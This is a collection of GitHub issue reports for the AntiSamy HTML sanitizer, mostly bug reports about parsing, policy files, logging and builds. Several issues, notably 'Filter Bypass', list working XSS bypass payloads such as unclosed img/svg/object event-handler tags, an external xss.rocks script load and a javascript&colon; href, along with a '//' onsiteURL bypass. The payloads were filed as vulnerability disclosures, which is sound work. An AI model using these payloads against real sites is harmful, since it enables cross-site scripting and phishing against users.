[ERROR] Plugin org.apache.maven.plugins:maven-enforcer-plugin:3.0.0-M3 or one of its dependencies could not be resolved: Failed to read artifact descriptor for org.apache.maven.plugins:maven-enforcer-plugin:jar:3.0.0-M3: Could not transfer artifact org.apache.maven.plugins:maven-enforcer-plugin:pom:3.0.0-M3 from/to central (https://repo.maven.apache.org/maven2): transfer failed for https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-enforcer-plugin/3.0.0-M3/maven-enforcer-plugin-3.0.0-M3.pom: Received fatal alert: protocol_version -> [Help 1]
......

Reason

1. The test case testGithubIssue79 requires JDK 8.
2. Java 7 defaults to TLSv1.0, but maven-enforcer-plugin-3.0.0-M3.pom has instructions to set it to TLSv1.2.
All of this means that the new version of AntiSamy no longer supports Java 7 and needs at least Java 8, yet the README states that AntiSamy 1.6.4 supports Java 7+.
As far as I know, the JDK now has only two LTS versions, Java 8 and Java 11, and the other versions are no longer maintained.
Why does AntiSamy still need to support Java 7?

Best Regards

incomplete tag removing rest of content

I have a problem: when the content contains a "<" symbol without a matching ">", everything to the right of it is removed.
Added directive: <directive name="onUnknownTag" value="encode"/>
Input: "hello <hi world, it is clean"
Output: "hello"
Is there any way to get the output to be the same as the input in this case?
Expected output: "hello <hi world, it is clean"

AntiSamy is not working for special case

AntiSamy does not work for this test case; I tried the latest version as well.
It fails when there is a "/" character inside the tag.

My test case:
@Test
public void testXSSScript() throws PolicyException, ScanException {
    String result = scanner.scan("<style/onload=alert(document.domain)>");
    assertEquals("", result);
}

==== Logic called by the test case ====
Please assume the policy is loaded (I attached antisamy.xml). For some reason, no error is reported for <style/onload=alert(document.domain)> when "Collection errors = r.getErrorMessages();" executes.

public String scan(String untrustedUserInput) throws PolicyException, ScanException {
    CleanResults r = webSecurityScanner.scan(untrustedUserInput, AntiSamy.SAX);
    if(logger.isDebugEnabled()) {
        logger.debug("Scanned request parameter in " + r.getScanTime() + "ms");
        logger.debug("Value: " + untrustedUserInput);
        logger.debug("Result: " + r.getCleanHTML());
        logger.debug("Errors: " + r.getErrorMessages());
    }

    Collection<String> errors = r.getErrorMessages();
    if(CollectionUtils.exists(errors, securityErrorPredicate)) {
        logger.info("Returning cleansed input due to " + errors.size() + " security errors: " + errors);
        logger.debug("Original: [" + untrustedUserInput + "]");

        final String cleansedHTML = fixMangledTags(r.getCleanHTML());
        logger.debug("Cleansed: [" + cleansedHTML + "]");
        return cleansedHTML;
    }
    return untrustedUserInput;
}

antisamy.zip

Policy schema does not match xml structure

The provided files "antisamy.xml" and "antisamy.xsd" don't match.
The XML file contains <dynamic-tag-attributes>, but the schema does not include such a tag.

The lang subtag is stripped

<p lang="en-GB">This paragraph is defined as British English.</p>
Output:
<p>This paragraph is defined as British English.</p>

Hi, @davewichers Is there a security problem here? Why not support IANA subtags?

Antisamy removes "margin" attribute when its value is configured as a very small decimal number

Steps to reproduce the problem:

Create HTML content containing a tag with a style attribute, e.g. <p style="margin: 0.0001pt;" />.
Use the filterHTML API to filter the above HTML content.
In the response, the "margin" property is removed, with warning log [1].

Expected output:
With regexp configuration [2], the margin should not be removed for any decimal number.

[1] AntiSamy warning: The p tag had a style attribute, "margin", that could not be allowed for security reasons.
[2] <regexp name="length" value="((-|\+)?0|(-|\+)?([0-9]+(\.[0-9]*)?)(em|ex|px|in|cm|mm|pt|pc))"/>
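
As written, regexp [2] does accept 0.0001pt, so the rejection may come from a different textual form of the value. One possibility, which is an assumption and not confirmed in this report, is that the number is held as a float and printed in scientific notation before it is validated. The sketch below uses only the JDK and checks both forms against the regexp; the class name is hypothetical.

```java
import java.util.regex.Pattern;

// Hypothetical illustration: the "length" regexp versus two renderings of the same number.
final class LengthRegexSketch {

    // Regexp [2] from the report, escaped for a Java string literal.
    static final Pattern LENGTH = Pattern.compile(
            "((-|\\+)?0|(-|\\+)?([0-9]+(\\.[0-9]*)?)(em|ex|px|in|cm|mm|pt|pc))");

    static boolean isValidLength(String value) {
        return LENGTH.matcher(value).matches();
    }

    public static void main(String[] args) {
        String plain = "0.0001pt";
        // Float.toString switches to scientific notation for magnitudes below 10^-3.
        String viaFloat = Float.toString(0.0001f) + "pt";
        System.out.println(plain + " -> " + isValidLength(plain));
        System.out.println(viaFloat + " -> " + isValidLength(viaFloat));
    }
}
```

If this is what happens, either formatting the number without an exponent before validation or widening the regexp would let such values through; which one is appropriate depends on where the conversion takes place.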

Support HTML5

AntiSamy uses a deprecated HTMLSerializer which does not understand newer HTML5 tags like <figure>. While this is a minor issue, it also does not understand newer HTML5 entities like &colon; or &lpar;. This leads to a security vulnerability where the following text does not get cleaned:

<a href="javascript&colon;alert&lpar;1&rpar;">X</a>

Filter Bypass

AntiSamy fails to filter (identify) HTML / HTML5 elements with event handlers (onerror, onload, etc.) when the tags are not closed with a ">" character.
Modern browsers (tested with Firefox and Chrome) will autocomplete such tags and hence execute the JavaScript, leading to cross-site scripting (XSS).

Example Payloads for better understanding -

<img src=# onerror=alert(0)//K7-onerror_attribute
<img src=data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAAAMSURBVBhXY/j//z8ABf4C/qc1gYQAAAAASUVORK5CYII= onload=alert(0)//K7-onload_attribute
<input type="image" src=# onerror=alert(0)//K7-works_for_other_html_n_html5_tags
<object data=# onerror=alert(0)//K7-FireFox_specific
<object data=# onload=alert(0)//K7-Chrome_specific
<script onerror=alert(0) onload=alert(1) src=http://xss.rocks/xss.js#K7-script_tag_works_under_specific_conditions
<svg onload=alert(0)//K7-SVG_special_char_variant

I have tested using both - SAX and DOM, found the payloads to execute.

Karan Ramani

Antisamy Stripping nested lists and tables

If I input the following html:

<ul>
    <li> one </li>
    <li> two</li>
    <li> three 
          <ul>
             <li>a</li>
             <li>b</li>
          </ul>
    </li>
</ul>

The following output occurs:

<ul>
    <li> one </li>
    <li> two</li>
    <li> three 
          <ul>
          </ul>
    </li>
    <li>a</li>
    <li>b</li>
</ul>

Basically it moves the nested list content to the parent list. This seems to be a bug since I can't find any configuration to fix this.

AntiSamy Bypass - looking for security contact

I'm reasonably sure that I found a bypass leading to XSS. Can I please get a contact to further discuss this issue?

Antisamy 1.6 introduces log4j dependency

When updating one of my modules to Antisamy 1.6 I got a test failure due to org.owasp.validator.html.Policy now having a hard dependency on log4j, whereas the pom.xml declares that it's using slf4j.

https://github.com/nahsra/antisamy/blob/master/src/main/java/org/owasp/validator/html/Policy.java#L83

It appears this was introduced in the commit:

64416f1#diff-ea20191cc92e7360f2cc25757c0fd872902416e123220b6649b0dc7a0af5663b

It seems this is the ONLY logging in the project. The logging dependency doesn't appear to be mentioned in the release notes at https://github.com/nahsra/antisamy/releases/tag/v1.6.0 either.

Since slf4j is mentioned, shouldn't this use only the slf4j API, with slf4j-over-log4j used ONLY in tests or client applications?

IOException on Policy creation from InputStream when schema validation is disabled

Antisamy version: 1.6.1

Problem

Unable to generate a Policy instance from Policy.getInstance(InputStream) when antisamy schema validation is disabled and the configuration file contains an invalid structure.

antisamy_tests.tar.gz

Results :

Tests in error: 
  testSystemProp(antisamy_tests.InvalidPolicyTest): java.io.IOException: Stream closed
  testDirectConfig(antisamy_tests.InvalidPolicyTest): java.io.IOException: Stream closed

Tests run: 2, Failures: 0, Errors: 2, Skipped: 0

mvnCleanTest.txt
mvnCleanTest_verbose.txt

Initial Assessment

Pertinent Stacktrace from logs:

org.owasp.validator.html.PolicyException: java.io.IOException: Stream closed
	at org.owasp.validator.html.Policy.getTopLevelElement(Policy.java:379)
	at org.owasp.validator.html.Policy.getTopLevelElement(Policy.java:355)
	at org.owasp.validator.html.Policy.getInstance(Policy.java:235)

Snippet from Policy.java

protected static Element getTopLevelElement(InputSource source, Callable<InputSource> getResetSource) throws PolicyException {
        // Track whether an exception was ever thrown while processing policy file
        Exception thrownException = null;
        try {
            return getDocumentElementFromSource(source, true); // >> first stream use
        } catch (SAXException e) {
            thrownException = e;
            if (!validateSchema) {
                try {
                    source = getResetSource.call();
                    Element theElement = getDocumentElementFromSource(source, false); // >> Second stream use
                    // We warn when the policy has an invalid schema, but schema validation is disabled.
                    logger.warn("Invalid policy file: " + e.getMessage());
                    return theElement;
                } catch (Exception e2) {
                    throw new PolicyException(e2);
                }
            } else throw new PolicyException(e);
        } catch (ParserConfigurationException | IOException e) {
            thrownException = e;
            throw new PolicyException(e); // >> EXCEPTION
        } finally {
            if (!validateSchema && (thrownException == null)) {
                // We warn when the policy has a valid schema, but schema validation is disabled.
                logger.warn("XML schema validation is disabled for a valid policy. Please reenable policy validation.");
            }
        }
    }

I think the first stream use completes the read (I've followed it all the way to the return statement of getDocumentElementFromSource) and then closes the stream. Parsing then fails on return, and execution falls into the SAXException block. Because schema validation is disabled, the code tries again, but the source object was never reset after the first read, so the second attempt reads from a closed stream. I can't see the actual stream in my debugger, so I can't be 100% certain, but this flow matches the current test output.
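If that diagnosis is right, one way to make the retry possible is to buffer the policy bytes once and hand out a fresh InputSource for every parse attempt. The sketch below is only an illustration of that idea, not AntiSamy's actual fix: the class ReplayablePolicySource and its methods are hypothetical names, and it assumes the policy file is small enough to hold in memory.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.UncheckedIOException;
import java.nio.charset.StandardCharsets;
import java.util.function.Supplier;
import org.xml.sax.InputSource;

// Hypothetical helper, not part of AntiSamy.
public class ReplayablePolicySource {

    // Reads the stream to the end, closes it, and returns its content.
    static byte[] readFully(InputStream in) {
        try (InputStream stream = in) {
            ByteArrayOutputStream out = new ByteArrayOutputStream();
            byte[] buffer = new byte[4096];
            int n;
            while ((n = stream.read(buffer)) != -1) {
                out.write(buffer, 0, n);
            }
            return out.toByteArray();
        } catch (IOException e) {
            throw new UncheckedIOException(e);
        }
    }

    // Consumes the original stream once; every get() returns a new,
    // unread InputSource backed by the buffered bytes.
    static Supplier<InputSource> replayable(InputStream original) {
        final byte[] bytes = readFully(original);
        return () -> new InputSource(new ByteArrayInputStream(bytes));
    }

    // Convenience for demonstrations: reads an InputSource back as UTF-8 text.
    static String drain(InputSource source) {
        return new String(readFully(source.getByteStream()), StandardCharsets.UTF_8);
    }
}
```

A caller could pass replayable(stream).get() to the validating parse and call get() again for the non-validating retry, so the second attempt never touches the already-closed stream.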

AntiSamy rules not getting applied to attributes if an attribute does not have a value

In a web project we use the ESAPI validator to sanitize inputs. While most improper inputs are detected as expected, it fails to detect the input below as improper. I am using the esapi-2.1.0.1 and antisamy-1.5.3 jars.

<img src=x onerror=alert(1) alt=

Potentially, the browser closes the tag itself, hence triggering the alert function. Surprisingly, ESAPI detects the below given input as improper:

<img src=x onerror=alert(1) alt="text"

Below are some test cases and the analysis:
Regex used for the alt attribute: [a-zA-Z0-9:-_.]+ (it needs at least one character)
Regex used for the onerror attribute: [0-9\s*,]* (it allows numbers and whitespace characters)

Input: <img src=x alt="" || Observation: Tag is filtered || Status: Passed
Input: <img src=x alt= || Observation: Tag not filtered || Status: Failed
Input: <img src=x onerror=alert(1) alt="" || Observation: Tag is filtered (due to regex condition for onerror) || Status: Passed
Input: <img src=x onerror=alert(1) alt= || Observation: Tag not filtered || Status: Failed

Observation:
The value of the alt attribute changes the behavior of attribute validation (for itself in cases 1 & 2, and for other attributes in cases 3 & 4).
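To separate the patterns from the parsing, the two regexes quoted above can be checked on their own. This is a minimal sketch that assumes attribute values must match the whole pattern; the class and method names are hypothetical and it does not call ESAPI or AntiSamy.

```java
import java.util.regex.Pattern;

// Hypothetical stand-alone check of the two patterns quoted in this issue.
public class AttributeRegexCheck {
    static final Pattern ALT = Pattern.compile("[a-zA-Z0-9:-_.]+");
    static final Pattern ONERROR = Pattern.compile("[0-9\\s*,]*");

    // True when the whole value matches the alt pattern.
    static boolean altAllowed(String value) {
        return ALT.matcher(value).matches();
    }

    // True when the whole value matches the onerror pattern.
    static boolean onerrorAllowed(String value) {
        return ONERROR.matcher(value).matches();
    }

    public static void main(String[] args) {
        System.out.println(altAllowed(""));             // empty alt value
        System.out.println(altAllowed("text"));         // ordinary alt value
        System.out.println(onerrorAllowed("alert(1)")); // script payload
        System.out.println(onerrorAllowed("1, 2"));     // digits, comma, space
    }
}
```

Taken in isolation, the patterns reject both an empty alt value and alert(1), so the unfiltered cases are more likely related to how the unterminated tag is parsed than to the patterns themselves. As a side observation, `:-_` inside the alt character class is a range (from `:` to `_`), so it also admits characters such as `<` and `=`.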

Questions:

For case 4, isn't the regex for onerror still supposed to validate the onerror attribute? Does it have something to do with the alt attribute value?
What are the probable reasons why the value of the alt attribute could alter the behavior of other attributes?

Can anyone please offer suggestions or comments on how to mitigate the issue, or point out where I am going wrong?

Thanks.

German translations of validation errors are partially written in bad German

The validation message
"Der h3 Tag leer war, und daher konnten wir nicht verarbeiten. Der Rest der Nachricht intakt ist, und ihre Entfernung sollte keine Nebenwirkungen."
is not correct German.

This should be fixed in /src/main/resources/AntiSamy_de_DE.properties

Style validation in attributes isn't properly handled

This was given CVE-2016-10006, and was reported by Vivek Krishna, Zoho Corporation.

License

Please add a license file to your project

Update batik-css to 1.14

This would address a vulnerability in a downstream dependency
https://app.snyk.io/vuln/SNYK-JAVA-ORGAPACHEXMLGRAPHICS-1079038

Antisamy stripping @ and not encoding if it falls within <>

I am using antisamy 1.5.7.

I saw an issue when the input was

firstname,lastname<[email protected]> or firstname,lastname<[email protected] testing>

The result after the Antisamy scan is the same for both cases above:

firstname,lastname<name>

I have the directive below in the policy file:

<directive name="onUnknownTag" value="encode"/>

Is there a place in the policy file I can update so that @ is encoded when it appears within <>?

Multiple definition of tags on every policy file

On every policy XML file, I've found that the tag "col" is defined twice.

The first appearance is:

<tag name="col" action="validate"/>

And the second is:

<tag name="col" action="validate">
    <attribute name="align" />
    ...
    <attribute name="width" />
</tag>

The same thing happens with the property "clip", but this one is an exact copy.

This is not a real issue in Java, as the tests would fail when parsing the policy if it were. However, when implementing this on .NET for example, parsing may fail if you assume each definition appears only once.

My proposal is to first verify if it is there on purpose. If it isn't, remove it. In my opinion, it makes no sense to have multiple definitions for anything here, it is just confusing for anyone who doesn't know about it as in Java this doesn't fail.

If it is OK to remove the duplicated tags, I can remove them and make the pull request (of course, tests don't fail when removing the tags from the default policy).
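A quick way to confirm which definitions are duplicated is to scan a policy file for elements that share a name attribute. The sketch below uses only the JDK's DOM parser; DuplicateTagFinder is a hypothetical helper, and it assumes that every element with the given element name in the file is meant to be unique by name.

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import java.util.HashSet;
import java.util.Set;
import java.util.TreeSet;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.w3c.dom.Element;
import org.w3c.dom.NodeList;

// Hypothetical helper, not part of AntiSamy.
public class DuplicateTagFinder {

    // Returns the "name" values that occur more than once among
    // elements called elementName (for example "tag" or "property").
    static Set<String> duplicateNames(String xml, String elementName) {
        try {
            Document doc = DocumentBuilderFactory.newInstance()
                    .newDocumentBuilder()
                    .parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
            NodeList nodes = doc.getElementsByTagName(elementName);
            Set<String> seen = new HashSet<>();
            Set<String> duplicates = new TreeSet<>();
            for (int i = 0; i < nodes.getLength(); i++) {
                String name = ((Element) nodes.item(i)).getAttribute("name");
                if (!seen.add(name)) {
                    duplicates.add(name); // second or later occurrence
                }
            }
            return duplicates;
        } catch (Exception e) {
            throw new IllegalStateException("Could not parse policy XML", e);
        }
    }
}
```

Running it with elementName "tag" and then "property" over each policy file would list candidates such as "col" and "clip" before they are removed.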

The default onsiteURL regex is not safe: if the URL starts with '//', it can escape the origin domain

The default onsiteURL regex:
<regexp name="onsiteURL" value="^(?![\p{L}\p{N}\\\.\#@\$%\+&;\-_~,\?=/!]*(&colon))[\p{L}\p{N}\\\.\#@\$%\+&;\-_~,\?=/!]*"/>

Usually, rich text requires the href attribute, with a validation rule like this:

<attribute name="href">
			<regexp-list>
				<regexp name="onsiteURL" />
			</regexp-list>
</attribute>

So if developers trust the onsiteURL regex, they will not do any other domain validation. However, the onsiteURL regex can be bypassed with '//', as in '//evali.com?params'. In this case, phishing attacks may occur. In addition, information may leak through attacks such as dangling markup.
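The bypass can be reproduced with the pattern alone. The sketch below copies the onsiteURL regex as quoted in this issue into a Java string and assumes the value must match the whole pattern. The extra guard isSameOriginPath is a hypothetical mitigation added for illustration, not something AntiSamy provides.

```java
import java.util.regex.Pattern;

// Hypothetical stand-alone check; it does not call AntiSamy.
public class OnsiteUrlCheck {
    // The onsiteURL pattern quoted above, escaped for a Java string literal.
    static final Pattern ONSITE_URL = Pattern.compile(
            "^(?![\\p{L}\\p{N}\\\\\\.\\#@\\$%\\+&;\\-_~,\\?=/!]*(&colon))"
            + "[\\p{L}\\p{N}\\\\\\.\\#@\\$%\\+&;\\-_~,\\?=/!]*");

    // True when the whole value matches the onsiteURL pattern.
    static boolean matchesOnsiteUrl(String value) {
        return ONSITE_URL.matcher(value).matches();
    }

    // Hypothetical guard: also reject values whose first two characters
    // are slashes or backslashes, since such values name another host.
    static boolean isSameOriginPath(String value) {
        boolean startsLikeAuthority = value.length() >= 2
                && (value.charAt(0) == '/' || value.charAt(0) == '\\')
                && (value.charAt(1) == '/' || value.charAt(1) == '\\');
        return matchesOnsiteUrl(value) && !startsLikeAuthority;
    }

    public static void main(String[] args) {
        System.out.println(matchesOnsiteUrl("/terms/vacancy.html"));
        System.out.println(matchesOnsiteUrl("//evali.com?params"));
        System.out.println(isSameOriginPath("//evali.com?params"));
    }
}
```

Because '/' is in the allowed character class and nothing restricts where it appears, a protocol-relative value passes the pattern; a check on the leading characters, or a stricter pattern, would be needed to keep links on the origin.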

Antisamy adds nested table tags

Input

Output after antisamy scan

After scanning, additional nested table close tags </tbody></table></td></tr> are added one line before the img tag, so the output becomes distorted. I am using antisamy.xml and am not sure why nested table tags are added by the antisamy scan.

The 'data-*' dynamic attribute is not supported by AntiSamy.DOM.

Using AntiSamy.SAX

String input = "<div data-title=\"Pocahontas\" >Just Around the Riverbend</div>";
CleanResults results = new AntiSamy().scan(input, Policy.getInstance(), AntiSamy.SAX);
System.out.println("result: " + results.getCleanHTML());

// result: <div data-title="Pocahontas">Just Around the Riverbend</div>

Using AntiSamy.DOM

result: <div>Just Around the Riverbend</div>

Expect

result: <div data-title="Pocahontas">Just Around the Riverbend</div>

AntiSamy.DOM is the default mode, so it should support dynamic attributes.

New URL validation breaks loading from jar files

A change late last year to prevent loading of remote URLs was achieved by checking that the URL only uses the file: scheme. This breaks a very common use case, which is bundling the policy file inside a Java archive of some sort (jar/war/ear). AFAICT this is no more of a security risk than loading a file from a file: URL, and disabling this ability significantly increases the complexity of deployment in some contexts.
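The effect of a file-only scheme check on bundled policies can be illustrated without AntiSamy. The sketch below is an assumption about the general shape of such a check, not the library's actual code; PolicyUrlSchemeCheck and both scheme sets are hypothetical, and the URLs are made-up examples.

```java
import java.net.URI;
import java.util.Arrays;
import java.util.HashSet;
import java.util.Set;

// Hypothetical illustration of a scheme allow-list; not AntiSamy's code.
public class PolicyUrlSchemeCheck {
    static final Set<String> FILE_ONLY = new HashSet<>(Arrays.asList("file"));
    static final Set<String> FILE_AND_JAR = new HashSet<>(Arrays.asList("file", "jar"));

    // True when the URL's scheme is in the allowed set.
    static boolean isAllowed(String url, Set<String> allowedSchemes) {
        String scheme = URI.create(url).getScheme();
        return scheme != null && allowedSchemes.contains(scheme.toLowerCase());
    }

    public static void main(String[] args) {
        String onDisk = "file:/opt/app/conf/antisamy.xml";
        String inJar = "jar:file:/opt/app/lib/policies.jar!/antisamy.xml";
        System.out.println(isAllowed(onDisk, FILE_ONLY));
        System.out.println(isAllowed(inJar, FILE_ONLY));
        System.out.println(isAllowed(inJar, FILE_AND_JAR));
    }
}
```

A resource inside an archive has the scheme jar rather than file, which is why a file-only check rejects it. Note that a jar: URL can itself wrap a remote location, so a real check that admits jar would likely also need to inspect the inner URL.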

<> cannot be used after 1.5

The front end passes a parameter through the URL, and the value of the parameter is <>. It is processed with:

Policy policy = Policy.getInstance("/antisamy-slashdot-1.4.4.xml");
final CleanResults cr = antiSamy.scan(value, policy);
String str = cr.getCleanHTML();

The resulting str contains the escaped form of <>. There was no such problem before 1.5; why does it happen from 1.5 onwards?

Embedded style sheets should not all be deleted when `embedStyleSheets` is enabled.

Set 'embedStyleSheets' in the configuration:

<directive name="embedStyleSheets" value="true"/>

Input:

<!DOCTYPE html>
<html>
	<head>
		<style type='text/css'>
			@import url(https://unpkg.com/element-ui/lib/theme-chalk/index.css)
			h1 {font: 15pt "Arial"; color: blue;}
			p {font: 10pt "Arial"; color: black;}
		</style>
	</head>
	<body>
		<div>
			<h1>Title</h1>
			<p>content</p>
		</div>
	</body>
</html>

Output:

<html>
  <head>
    <style type="text/css"><![CDATA[/* */]]></style></head>
  <body>
    <div>
      <h1>Title</h1>
      <p>content</p></div></body></html>

Result: All embedded styles are deleted.

antisamy/src/main/java/org/owasp/validator/css/ExternalCssScanner.java

Lines 71 to 72 in 9733b9f

    protected void parseImportedStylesheets(LinkedList<?> stylesheets, CssHandler handler,
            ArrayList<String> errorMessages, int sizeLimit) throws ScanException {

I found that the parseImportedStylesheets method signature cannot override the parseImportedStylesheets method of the parent class and will never be called. This seems to be a bug.
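The general Java behaviour behind this report can be shown in isolation: a subclass method whose parameter types differ from the parent's is an overload, so calls made through the parent's signature never reach it. The classes below are hypothetical stand-ins, since the parent class signature is not shown here, and are not the AntiSamy scanner classes.

```java
import java.util.LinkedList;
import java.util.List;

// Hypothetical classes illustrating overload versus override.
public class OverloadVsOverride {

    static class BaseScanner {
        String parseImported(List<String> sheets) {
            return "base";
        }

        // The parent always calls the List<String> version.
        String scan(List<String> sheets) {
            return parseImported(sheets);
        }
    }

    static class ExternalScanner extends BaseScanner {
        // Different parameter type: this overloads and is never
        // called by BaseScanner.scan.
        String parseImported(LinkedList<String> sheets) {
            return "external";
        }
    }

    static class FixedScanner extends BaseScanner {
        // Same signature as the parent; @Override makes the compiler
        // reject the method if the signatures ever drift apart.
        @Override
        String parseImported(List<String> sheets) {
            return "fixed";
        }
    }

    public static void main(String[] args) {
        System.out.println(new ExternalScanner().scan(new LinkedList<String>()));
        System.out.println(new FixedScanner().scan(new LinkedList<String>()));
    }
}
```

Annotating the subclass method with @Override is a cheap way to confirm whether a signature really overrides its parent, because a mismatch becomes a compile error.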

Hi, @davewichers @spassarop Is this check deprecated?

	protected void parseImportedStylesheets(LinkedList<?> stylesheets, CssHandler handler,
	ArrayList<String> errorMessages, int sizeLimit) throws ScanException {